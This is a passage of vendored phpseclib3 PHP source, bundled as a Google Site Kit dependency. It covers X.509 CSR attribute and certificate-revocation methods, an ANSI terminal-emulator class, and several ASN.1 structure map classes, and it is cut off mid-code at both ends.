$n: $disposition -= $n; break; case $disposition == self::ATTR_ALL: case $n == 1: unset($attributes[$key]); $result = \true; break; default: unset($attributes[$key]['value'][$disposition]); $attributes[$key]['value'] = \array_values($attributes[$key]['value']); $result = \true; break; } if ($result && $disposition != self::ATTR_ALL) { break; } } } $attributes = \array_values($attributes); return $result; } /** * Get a CSR attribute * * Returns the attribute if it exists and false if not * * @param string $id * @param int $disposition optional * @param array $csr optional * @return mixed */ public function getAttribute($id, $disposition = self::ATTR_ALL, $csr = null) { if (empty($csr)) { $csr = $this->currentCert; } $attributes = $this->subArray($csr, 'certificationRequestInfo/attributes'); if (!\is_array($attributes)) { return \false; } foreach ($attributes as $key => $attribute) { if ($attribute['type'] == $id) { $n = \count($attribute['value']); switch (\true) { case $disposition == self::ATTR_APPEND: case $disposition == self::ATTR_REPLACE: return \false; case $disposition == self::ATTR_ALL: return $attribute['value']; case $disposition >= $n: $disposition -= $n; break; default: return $attribute['value'][$disposition]; } } } return \false; } /** * Get all requested CSR extensions * * Returns the list of extensions if there are any and false if not * * @param array $csr optional * @return mixed */ public function getRequestedCertificateExtensions($csr = null) { if (empty($csr)) { $csr = $this->currentCert; } $requestedExtensions = $this->getAttribute('pkcs-9-at-extensionRequest'); if ($requestedExtensions === \false) { return \false; } return $this->getAttribute('pkcs-9-at-extensionRequest')[0]; } /** * Returns a list of all CSR attributes in use * * @param array $csr optional * @return array */ public function getAttributes($csr = null) { if (empty($csr)) { $csr = $this->currentCert; } $attributes = $this->subArray($csr, 'certificationRequestInfo/attributes'); $attrs = []; if (\is_array($attributes)) { foreach ($attributes as $attribute) { $attrs[] = $attribute['type']; } } return $attrs; } /** * Set a CSR attribute * * @param string $id * @param mixed $value * @param int $disposition optional * @return bool */ public function setAttribute($id, $value, $disposition = self::ATTR_ALL) { $attributes =& $this->subArray($this->currentCert, 'certificationRequestInfo/attributes', \true); if (!\is_array($attributes)) { return \false; } switch ($disposition) { case self::ATTR_REPLACE: $disposition = self::ATTR_APPEND; // fall-through case self::ATTR_ALL: $this->removeAttribute($id); break; } foreach ($attributes as $key => $attribute) { if ($attribute['type'] == $id) { $n = \count($attribute['value']); switch (\true) { case $disposition == self::ATTR_APPEND: $last = $key; break; case $disposition >= $n: $disposition -= $n; break; default: $attributes[$key]['value'][$disposition] = $value; return \true; } } } switch (\true) { case $disposition >= 0: return \false; case isset($last): $attributes[$last]['value'][] = $value; break; default: $attributes[] = ['type' => $id, 'value' => $disposition == self::ATTR_ALL ? $value : [$value]]; break; } return \true; } /** * Sets the subject key identifier * * This is used by the id-ce-authorityKeyIdentifier and the id-ce-subjectKeyIdentifier extensions. * * @param string $value */ public function setKeyIdentifier($value) { if (empty($value)) { unset($this->currentKeyIdentifier); } else { $this->currentKeyIdentifier = $value; } } /** * Compute a public key identifier. * * Although key identifiers may be set to any unique value, this function * computes key identifiers from public key according to the two * recommended methods (4.2.1.2 RFC 3280). * Highly polymorphic: try to accept all possible forms of key: * - Key object * - \phpseclib3\File\X509 object with public or private key defined * - Certificate or CSR array * - \phpseclib3\File\ASN1\Element object * - PEM or DER string * * @param mixed $key optional * @param int $method optional * @return string binary key identifier */ public function computeKeyIdentifier($key = null, $method = 1) { if (\is_null($key)) { $key = $this; } switch (\true) { case \is_string($key): break; case \is_array($key) && isset($key['tbsCertificate']['subjectPublicKeyInfo']['subjectPublicKey']): return $this->computeKeyIdentifier($key['tbsCertificate']['subjectPublicKeyInfo']['subjectPublicKey'], $method); case \is_array($key) && isset($key['certificationRequestInfo']['subjectPKInfo']['subjectPublicKey']): return $this->computeKeyIdentifier($key['certificationRequestInfo']['subjectPKInfo']['subjectPublicKey'], $method); case !\is_object($key): return \false; case $key instanceof \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element: // Assume the element is a bitstring-packed key. $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($key->element); if (!$decoded) { return \false; } $raw = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_BIT_STRING]); if (empty($raw)) { return \false; } // If the key is private, compute identifier from its corresponding public key. $key = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\PublicKeyLoader::load($raw); if ($key instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PrivateKey) { // If private. return $this->computeKeyIdentifier($key, $method); } $key = $raw; // Is a public key. break; case $key instanceof \Google\Site_Kit_Dependencies\phpseclib3\File\X509: if (isset($key->publicKey)) { return $this->computeKeyIdentifier($key->publicKey, $method); } if (isset($key->privateKey)) { return $this->computeKeyIdentifier($key->privateKey, $method); } if (isset($key->currentCert['tbsCertificate']) || isset($key->currentCert['certificationRequestInfo'])) { return $this->computeKeyIdentifier($key->currentCert, $method); } return \false; default: // Should be a key object (i.e.: \phpseclib3\Crypt\RSA). $key = $key->getPublicKey(); break; } // If in PEM format, convert to binary. $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::extractBER($key); // Now we have the key string: compute its sha-1 sum. $hash = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('sha1'); $hash = $hash->hash($key); if ($method == 2) { $hash = \substr($hash, -8); $hash[0] = \chr(\ord($hash[0]) & 0xf | 0x40); } return $hash; } /** * Format a public key as appropriate * * @return array|false */ private function formatSubjectPublicKey() { $format = $this->publicKey instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA && $this->publicKey->getPadding() & \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA::SIGNATURE_PSS ? 'PSS' : 'PKCS8'; $publicKey = \base64_decode(\preg_replace('#-.+-|[\\r\\n]#', '', $this->publicKey->toString($format))); $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($publicKey); if (!$decoded) { return \false; } $mapped = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\SubjectPublicKeyInfo::MAP); if (!\is_array($mapped)) { return \false; } $mapped['subjectPublicKey'] = $this->publicKey->toString($format); return $mapped; } /** * Set the domain name's which the cert is to be valid for * * @param mixed ...$domains * @return void */ public function setDomain(...$domains) { $this->domains = $domains; $this->removeDNProp('id-at-commonName'); $this->setDNProp('id-at-commonName', $this->domains[0]); } /** * Set the IP Addresses's which the cert is to be valid for * * @param mixed[] ...$ipAddresses */ public function setIPAddress(...$ipAddresses) { $this->ipAddresses = $ipAddresses; /* if (!isset($this->domains)) { $this->removeDNProp('id-at-commonName'); $this->setDNProp('id-at-commonName', $this->ipAddresses[0]); } */ } /** * Helper function to build domain array * * @param string $domain * @return array */ private static function dnsName($domain) { return ['dNSName' => $domain]; } /** * Helper function to build IP Address array * * (IPv6 is not currently supported) * * @param string $address * @return array */ private function iPAddress($address) { return ['iPAddress' => $address]; } /** * Get the index of a revoked certificate. * * @param array $rclist * @param string $serial * @param bool $create optional * @return int|false */ private function revokedCertificate(array &$rclist, $serial, $create = \false) { $serial = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($serial); foreach ($rclist as $i => $rc) { if (!$serial->compare($rc['userCertificate'])) { return $i; } } if (!$create) { return \false; } $i = \count($rclist); $revocationDate = new \DateTimeImmutable('now', new \DateTimeZone(@\date_default_timezone_get())); $rclist[] = ['userCertificate' => $serial, 'revocationDate' => $this->timeField($revocationDate->format('D, d M Y H:i:s O'))]; return $i; } /** * Revoke a certificate. * * @param string $serial * @param string $date optional * @return bool */ public function revoke($serial, $date = null) { if (isset($this->currentCert['tbsCertList'])) { if (\is_array($rclist =& $this->subArray($this->currentCert, 'tbsCertList/revokedCertificates', \true))) { if ($this->revokedCertificate($rclist, $serial) === \false) { // If not yet revoked if (($i = $this->revokedCertificate($rclist, $serial, \true)) !== \false) { if (!empty($date)) { $rclist[$i]['revocationDate'] = $this->timeField($date); } return \true; } } } } return \false; } /** * Unrevoke a certificate. * * @param string $serial * @return bool */ public function unrevoke($serial) { if (\is_array($rclist =& $this->subArray($this->currentCert, 'tbsCertList/revokedCertificates'))) { if (($i = $this->revokedCertificate($rclist, $serial)) !== \false) { unset($rclist[$i]); $rclist = \array_values($rclist); return \true; } } return \false; } /** * Get a revoked certificate. * * @param string $serial * @return mixed */ public function getRevoked($serial) { if (\is_array($rclist = $this->subArray($this->currentCert, 'tbsCertList/revokedCertificates'))) { if (($i = $this->revokedCertificate($rclist, $serial)) !== \false) { return $rclist[$i]; } } return \false; } /** * List revoked certificates * * @param array $crl optional * @return array|bool */ public function listRevoked($crl = null) { if (!isset($crl)) { $crl = $this->currentCert; } if (!isset($crl['tbsCertList'])) { return \false; } $result = []; if (\is_array($rclist = $this->subArray($crl, 'tbsCertList/revokedCertificates'))) { foreach ($rclist as $rc) { $result[] = $rc['userCertificate']->toString(); } } return $result; } /** * Remove a Revoked Certificate Extension * * @param string $serial * @param string $id * @return bool */ public function removeRevokedCertificateExtension($serial, $id) { if (\is_array($rclist =& $this->subArray($this->currentCert, 'tbsCertList/revokedCertificates'))) { if (($i = $this->revokedCertificate($rclist, $serial)) !== \false) { return $this->removeExtensionHelper($id, "tbsCertList/revokedCertificates/{$i}/crlEntryExtensions"); } } return \false; } /** * Get a Revoked Certificate Extension * * Returns the extension if it exists and false if not * * @param string $serial * @param string $id * @param array $crl optional * @return mixed */ public function getRevokedCertificateExtension($serial, $id, $crl = null) { if (!isset($crl)) { $crl = $this->currentCert; } if (\is_array($rclist = $this->subArray($crl, 'tbsCertList/revokedCertificates'))) { if (($i = $this->revokedCertificate($rclist, $serial)) !== \false) { return $this->getExtension($id, $crl, "tbsCertList/revokedCertificates/{$i}/crlEntryExtensions"); } } return \false; } /** * Returns a list of all extensions in use for a given revoked certificate * * @param string $serial * @param array $crl optional * @return array|bool */ public function getRevokedCertificateExtensions($serial, $crl = null) { if (!isset($crl)) { $crl = $this->currentCert; } if (\is_array($rclist = $this->subArray($crl, 'tbsCertList/revokedCertificates'))) { if (($i = $this->revokedCertificate($rclist, $serial)) !== \false) { return $this->getExtensions($crl, "tbsCertList/revokedCertificates/{$i}/crlEntryExtensions"); } } return \false; } /** * Set a Revoked Certificate Extension * * @param string $serial * @param string $id * @param mixed $value * @param bool $critical optional * @param bool $replace optional * @return bool */ public function setRevokedCertificateExtension($serial, $id, $value, $critical = \false, $replace = \true) { if (isset($this->currentCert['tbsCertList'])) { if (\is_array($rclist =& $this->subArray($this->currentCert, 'tbsCertList/revokedCertificates', \true))) { if (($i = $this->revokedCertificate($rclist, $serial, \true)) !== \false) { return $this->setExtensionHelper($id, $value, $critical, $replace, "tbsCertList/revokedCertificates/{$i}/crlEntryExtensions"); } } } return \false; } /** * Register the mapping for a custom/unsupported extension. * * @param string $id * @param array $mapping */ public static function registerExtension($id, array $mapping) { if (isset(self::$extensions[$id]) && self::$extensions[$id] !== $mapping) { throw new \RuntimeException('Extension ' . $id . ' has already been defined with a different mapping.'); } self::$extensions[$id] = $mapping; } /** * Register the mapping for a custom/unsupported extension. * * @param string $id * * @return array|null */ public static function getRegisteredExtension($id) { return isset(self::$extensions[$id]) ? self::$extensions[$id] : null; } /** * Register the mapping for a custom/unsupported extension. * * @param string $id * @param mixed $value * @param bool $critical * @param bool $replace */ public function setExtensionValue($id, $value, $critical = \false, $replace = \false) { $this->extensionValues[$id] = \compact('critical', 'replace', 'value'); } } <?php /** * Pure-PHP ANSI Decoder * * PHP version 5 * * If you call read() in \phpseclib3\Net\SSH2 you may get {@link http://en.wikipedia.org/wiki/ANSI_escape_code ANSI escape codes} back. * They'd look like chr(0x1B) . '[00m' or whatever (0x1B = ESC). They tell a * {@link http://en.wikipedia.org/wiki/Terminal_emulator terminal emulator} how to format the characters, what * color to display them in, etc. \phpseclib3\File\ANSI is a {@link http://en.wikipedia.org/wiki/VT100 VT100} terminal emulator. * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2012 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File; /** * Pure-PHP ANSI Decoder * * @author Jim Wigginton <terrafrost@php.net> */ class ANSI { /** * Max Width * * @var int */ private $max_x; /** * Max Height * * @var int */ private $max_y; /** * Max History * * @var int */ private $max_history; /** * History * * @var array */ private $history; /** * History Attributes * * @var array */ private $history_attrs; /** * Current Column * * @var int */ private $x; /** * Current Row * * @var int */ private $y; /** * Old Column * * @var int */ private $old_x; /** * Old Row * * @var int */ private $old_y; /** * An empty attribute cell * * @var object */ private $base_attr_cell; /** * The current attribute cell * * @var object */ private $attr_cell; /** * An empty attribute row * * @var array */ private $attr_row; /** * The current screen text * * @var list<string> */ private $screen; /** * The current screen attributes * * @var array */ private $attrs; /** * Current ANSI code * * @var string */ private $ansi; /** * Tokenization * * @var array */ private $tokenization; /** * Default Constructor. * * @return ANSI */ public function __construct() { $attr_cell = new \stdClass(); $attr_cell->bold = \false; $attr_cell->underline = \false; $attr_cell->blink = \false; $attr_cell->background = 'black'; $attr_cell->foreground = 'white'; $attr_cell->reverse = \false; $this->base_attr_cell = clone $attr_cell; $this->attr_cell = clone $attr_cell; $this->setHistory(200); $this->setDimensions(80, 24); } /** * Set terminal width and height * * Resets the screen as well * * @param int $x * @param int $y */ public function setDimensions($x, $y) { $this->max_x = $x - 1; $this->max_y = $y - 1; $this->x = $this->y = 0; $this->history = $this->history_attrs = []; $this->attr_row = \array_fill(0, $this->max_x + 2, $this->base_attr_cell); $this->screen = \array_fill(0, $this->max_y + 1, ''); $this->attrs = \array_fill(0, $this->max_y + 1, $this->attr_row); $this->ansi = ''; } /** * Set the number of lines that should be logged past the terminal height * * @param int $history */ public function setHistory($history) { $this->max_history = $history; } /** * Load a string * * @param string $source */ public function loadString($source) { $this->setDimensions($this->max_x + 1, $this->max_y + 1); $this->appendString($source); } /** * Appdend a string * * @param string $source */ public function appendString($source) { $this->tokenization = ['']; for ($i = 0; $i < \strlen($source); $i++) { if (\strlen($this->ansi)) { $this->ansi .= $source[$i]; $chr = \ord($source[$i]); // http://en.wikipedia.org/wiki/ANSI_escape_code#Sequence_elements // single character CSI's not currently supported switch (\true) { case $this->ansi == "\x1b=": $this->ansi = ''; continue 2; case \strlen($this->ansi) == 2 && $chr >= 64 && $chr <= 95 && $chr != \ord('['): case \strlen($this->ansi) > 2 && $chr >= 64 && $chr <= 126: break; default: continue 2; } $this->tokenization[] = $this->ansi; $this->tokenization[] = ''; // http://ascii-table.com/ansi-escape-sequences-vt-100.php switch ($this->ansi) { case "\x1b[H": // Move cursor to upper left corner $this->old_x = $this->x; $this->old_y = $this->y; $this->x = $this->y = 0; break; case "\x1b[J": // Clear screen from cursor down $this->history = \array_merge($this->history, \array_slice(\array_splice($this->screen, $this->y + 1), 0, $this->old_y)); $this->screen = \array_merge($this->screen, \array_fill($this->y, $this->max_y, '')); $this->history_attrs = \array_merge($this->history_attrs, \array_slice(\array_splice($this->attrs, $this->y + 1), 0, $this->old_y)); $this->attrs = \array_merge($this->attrs, \array_fill($this->y, $this->max_y, $this->attr_row)); if (\count($this->history) == $this->max_history) { \array_shift($this->history); \array_shift($this->history_attrs); } // fall-through case "\x1b[K": // Clear screen from cursor right $this->screen[$this->y] = \substr($this->screen[$this->y], 0, $this->x); \array_splice($this->attrs[$this->y], $this->x + 1, $this->max_x - $this->x, \array_fill($this->x, $this->max_x - ($this->x - 1), $this->base_attr_cell)); break; case "\x1b[2K": // Clear entire line $this->screen[$this->y] = \str_repeat(' ', $this->x); $this->attrs[$this->y] = $this->attr_row; break; case "\x1b[?1h": // set cursor key to application case "\x1b[?25h": // show the cursor case "\x1b(B": // set united states g0 character set break; case "\x1bE": // Move to next line $this->newLine(); $this->x = 0; break; default: switch (\true) { case \preg_match('#\\x1B\\[(\\d+)B#', $this->ansi, $match): // Move cursor down n lines $this->old_y = $this->y; $this->y += (int) $match[1]; break; case \preg_match('#\\x1B\\[(\\d+);(\\d+)H#', $this->ansi, $match): // Move cursor to screen location v,h $this->old_x = $this->x; $this->old_y = $this->y; $this->x = $match[2] - 1; $this->y = (int) $match[1] - 1; break; case \preg_match('#\\x1B\\[(\\d+)C#', $this->ansi, $match): // Move cursor right n lines $this->old_x = $this->x; $this->x += $match[1]; break; case \preg_match('#\\x1B\\[(\\d+)D#', $this->ansi, $match): // Move cursor left n lines $this->old_x = $this->x; $this->x -= $match[1]; if ($this->x < 0) { $this->x = 0; } break; case \preg_match('#\\x1B\\[(\\d+);(\\d+)r#', $this->ansi, $match): // Set top and bottom lines of a window break; case \preg_match('#\\x1B\\[(\\d*(?:;\\d*)*)m#', $this->ansi, $match): // character attributes $attr_cell =& $this->attr_cell; $mods = \explode(';', $match[1]); foreach ($mods as $mod) { switch ($mod) { case '': case '0': // Turn off character attributes $attr_cell = clone $this->base_attr_cell; break; case '1': // Turn bold mode on $attr_cell->bold = \true; break; case '4': // Turn underline mode on $attr_cell->underline = \true; break; case '5': // Turn blinking mode on $attr_cell->blink = \true; break; case '7': // Turn reverse video on $attr_cell->reverse = !$attr_cell->reverse; $temp = $attr_cell->background; $attr_cell->background = $attr_cell->foreground; $attr_cell->foreground = $temp; break; default: // set colors //$front = $attr_cell->reverse ? &$attr_cell->background : &$attr_cell->foreground; $front =& $attr_cell->{$attr_cell->reverse ? 'background' : 'foreground'}; //$back = $attr_cell->reverse ? &$attr_cell->foreground : &$attr_cell->background; $back =& $attr_cell->{$attr_cell->reverse ? 'foreground' : 'background'}; switch ($mod) { // @codingStandardsIgnoreStart case '30': $front = 'black'; break; case '31': $front = 'red'; break; case '32': $front = 'green'; break; case '33': $front = 'yellow'; break; case '34': $front = 'blue'; break; case '35': $front = 'magenta'; break; case '36': $front = 'cyan'; break; case '37': $front = 'white'; break; case '40': $back = 'black'; break; case '41': $back = 'red'; break; case '42': $back = 'green'; break; case '43': $back = 'yellow'; break; case '44': $back = 'blue'; break; case '45': $back = 'magenta'; break; case '46': $back = 'cyan'; break; case '47': $back = 'white'; break; // @codingStandardsIgnoreEnd default: //user_error('Unsupported attribute: ' . $mod); $this->ansi = ''; break 2; } } } break; default: } } $this->ansi = ''; continue; } $this->tokenization[\count($this->tokenization) - 1] .= $source[$i]; switch ($source[$i]) { case "\r": $this->x = 0; break; case "\n": $this->newLine(); break; case "\x08": // backspace if ($this->x) { $this->x--; $this->attrs[$this->y][$this->x] = clone $this->base_attr_cell; $this->screen[$this->y] = \substr_replace($this->screen[$this->y], $source[$i], $this->x, 1); } break; case "\x0f": // shift break; case "\x1b": // start ANSI escape code $this->tokenization[\count($this->tokenization) - 1] = \substr($this->tokenization[\count($this->tokenization) - 1], 0, -1); //if (!strlen($this->tokenization[count($this->tokenization) - 1])) { // array_pop($this->tokenization); //} $this->ansi .= "\x1b"; break; default: $this->attrs[$this->y][$this->x] = clone $this->attr_cell; if ($this->x > \strlen($this->screen[$this->y])) { $this->screen[$this->y] = \str_repeat(' ', $this->x); } $this->screen[$this->y] = \substr_replace($this->screen[$this->y], $source[$i], $this->x, 1); if ($this->x > $this->max_x) { $this->x = 0; $this->newLine(); } else { $this->x++; } } } } /** * Add a new line * * Also update the $this->screen and $this->history buffers * */ private function newLine() { //if ($this->y < $this->max_y) { // $this->y++; //} while ($this->y >= $this->max_y) { $this->history = \array_merge($this->history, [\array_shift($this->screen)]); $this->screen[] = ''; $this->history_attrs = \array_merge($this->history_attrs, [\array_shift($this->attrs)]); $this->attrs[] = $this->attr_row; if (\count($this->history) >= $this->max_history) { \array_shift($this->history); \array_shift($this->history_attrs); } $this->y--; } $this->y++; } /** * Returns the current coordinate without preformating * * @param \stdClass $last_attr * @param \stdClass $cur_attr * @param string $char * @return string */ private function processCoordinate(\stdClass $last_attr, \stdClass $cur_attr, $char) { $output = ''; if ($last_attr != $cur_attr) { $close = $open = ''; if ($last_attr->foreground != $cur_attr->foreground) { if ($cur_attr->foreground != 'white') { $open .= '<span style="color: ' . $cur_attr->foreground . '">'; } if ($last_attr->foreground != 'white') { $close = '</span>' . $close; } } if ($last_attr->background != $cur_attr->background) { if ($cur_attr->background != 'black') { $open .= '<span style="background: ' . $cur_attr->background . '">'; } if ($last_attr->background != 'black') { $close = '</span>' . $close; } } if ($last_attr->bold != $cur_attr->bold) { if ($cur_attr->bold) { $open .= '<b>'; } else { $close = '</b>' . $close; } } if ($last_attr->underline != $cur_attr->underline) { if ($cur_attr->underline) { $open .= '<u>'; } else { $close = '</u>' . $close; } } if ($last_attr->blink != $cur_attr->blink) { if ($cur_attr->blink) { $open .= '<blink>'; } else { $close = '</blink>' . $close; } } $output .= $close . $open; } $output .= \htmlspecialchars($char); return $output; } /** * Returns the current screen without preformating * * @return string */ private function getScreenHelper() { $output = ''; $last_attr = $this->base_attr_cell; for ($i = 0; $i <= $this->max_y; $i++) { for ($j = 0; $j <= $this->max_x; $j++) { $cur_attr = $this->attrs[$i][$j]; $output .= $this->processCoordinate($last_attr, $cur_attr, isset($this->screen[$i][$j]) ? $this->screen[$i][$j] : ''); $last_attr = $this->attrs[$i][$j]; } $output .= "\r\n"; } $output = \substr($output, 0, -2); // close any remaining open tags $output .= $this->processCoordinate($last_attr, $this->base_attr_cell, ''); return \rtrim($output); } /** * Returns the current screen * * @return string */ public function getScreen() { return '<pre width="' . ($this->max_x + 1) . '" style="color: white; background: black">' . $this->getScreenHelper() . '</pre>'; } /** * Returns the current screen and the x previous lines * * @return string */ public function getHistory() { $scrollback = ''; $last_attr = $this->base_attr_cell; for ($i = 0; $i < \count($this->history); $i++) { for ($j = 0; $j <= $this->max_x + 1; $j++) { $cur_attr = $this->history_attrs[$i][$j]; $scrollback .= $this->processCoordinate($last_attr, $cur_attr, isset($this->history[$i][$j]) ? $this->history[$i][$j] : ''); $last_attr = $this->history_attrs[$i][$j]; } $scrollback .= "\r\n"; } $base_attr_cell = $this->base_attr_cell; $this->base_attr_cell = $last_attr; $scrollback .= $this->getScreen(); $this->base_attr_cell = $base_attr_cell; return '<pre width="' . ($this->max_x + 1) . '" style="color: white; background: black">' . $scrollback . '</span></pre>'; } } <?php /** * SpecifiedECDomain * * From: http://www.secg.org/sec1-v2.pdf#page=109 * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * SpecifiedECDomain * * @author Jim Wigginton <terrafrost@php.net> */ abstract class SpecifiedECDomain { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['version' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER, 'mapping' => [1 => 'ecdpVer1', 'ecdpVer2', 'ecdpVer3']], 'fieldID' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\FieldID::MAP, 'curve' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Curve::MAP, 'base' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\ECPoint::MAP, 'order' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER], 'cofactor' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER, 'optional' => \true], 'hash' => ['optional' => \true] + \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\HashAlgorithm::MAP]]; } <?php /** * Extension * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * Extension * * A certificate using system MUST reject the certificate if it encounters * a critical extension it does not recognize; however, a non-critical * extension may be ignored if it is not recognized. * * http://tools.ietf.org/html/rfc5280#section-4.2 * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Extension { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['extnId' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OBJECT_IDENTIFIER], 'critical' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_BOOLEAN, 'optional' => \true, 'default' => \false], 'extnValue' => ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OCTET_STRING]]]; } <?php /** * CertificateIssuer * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; /** * CertificateIssuer * * @author Jim Wigginton <terrafrost@php.net> */ abstract class CertificateIssuer { const MAP = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\GeneralNames::MAP; } <?php /** * PostalAddress * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * PostalAddress * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PostalAddress { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'optional' => \true, 'min' => 1, 'max' => -1, 'children' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DirectoryString::MAP]; } <?php /** * BuiltInDomainDefinedAttributes * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * BuiltInDomainDefinedAttributes * * @author Jim Wigginton <terrafrost@php.net> */ abstract class BuiltInDomainDefinedAttributes { const MAP = [ 'type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => 4, // ub-domain-defined-attributes 'children' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\BuiltInDomainDefinedAttribute::MAP, ]; } <?php /** * ECPoint * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * ECPoint * * @author Jim Wigginton <terrafrost@php.net> */ abstract class ECPoint { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_OCTET_STRING]; } <?php /** * CRLNumber * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * CRLNumber * * @author Jim Wigginton <terrafrost@php.net> */ abstract class CRLNumber { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_INTEGER]; } <?php /** * PBES2params * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * PBES2params * * from https://tools.ietf.org/html/rfc2898#appendix-A.3 * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PBES2params { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'children' => ['keyDerivationFunc' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AlgorithmIdentifier::MAP, 'encryptionScheme' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AlgorithmIdentifier::MAP]]; } <?php /** * IssuerAltName * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; /** * IssuerAltName * * @author Jim Wigginton <terrafrost@php.net> */ abstract class IssuerAltName { const MAP = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\GeneralNames::MAP; } <?php /** * GeneralNames * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * GeneralNames * * @author Jim Wigginton <terrafrost@php.net> */ abstract class GeneralNames { const MAP = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => -1, 'children' => 